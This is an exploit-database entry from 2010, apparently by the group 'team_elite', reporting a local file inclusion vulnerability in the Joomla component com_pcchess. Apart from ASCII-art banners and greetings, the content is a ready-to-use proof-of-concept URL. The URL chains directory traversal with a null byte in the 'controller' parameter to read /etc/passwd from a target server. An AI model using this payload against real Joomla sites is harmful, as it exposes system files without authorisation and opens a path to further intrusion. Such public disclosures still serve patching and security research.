id: 11692
date: 04/09/2010
title: joomla Component com_pcchess Local File Inclusion Vulnerability
author: TEAMELITE
cves: 

===============================================================
Joomla Component com_pcchess Local File Inclusion Vulnerability
===============================================================

================================================================================================
================================================================================================
==   @@@@@@@@  @@@@@@  @@@@@@@  @@       @@            @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==   @@@@@@@@  @@@@@@  @@@@@@@  @@@     @@@	       @@@@@@  @@      @@  @@@@@@@@  @@@@@@   ==
==      @@     @@      @@   @@  @@ @   @ @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@  @ @  @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@@@@@@  @@   @   @@            @@@@@@  @@      @@     @@     @@@@@@   ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@      @@   @@  @@       @@            @@      @@      @@     @@     @@       ==
==      @@     @@@@@@  @@   @@  @@       @@            @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==      @@     @@@@@@  @@   @@  @@       @@ @@@@@@@@@@ @@@@@@  @@@@@@  @@     @@     @@@@@@   ==
==											      ==
================================================================================================
================================================================================================
		 |||                                    |||
		 |||					|||
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
[[  								                                                     	[[  
[[ joomla Component com_pcchess Local File Inclusion Vulnerability 						        [[
[[															[[
[[ ** Bugs Found by team_elite | http://manadocoding.net | http://www.gcc.web.id/ |				       	[[
[[															[[
[[ ##   Exploit: index.php?option=com_pcchess&controller=[LFI]%00							[[
[[															[[
[[ ##   PoC: 													        [[
[[															[[
[[- http://[target]/[path]/index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00 [[
[[															[[
[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[
		 |||					|||
		 |||					|||
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~    Greetz and Thanks to: All member gcc, all member manadocoding   ~~~~
~~~~									~~~~
~~~~    MC team : team_elite , devilbat , zreg				~~~~
~~~~    thanks for : cr4wl3r						~~~~
~~~~									~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~




#  0day.today [2023-03-24]  #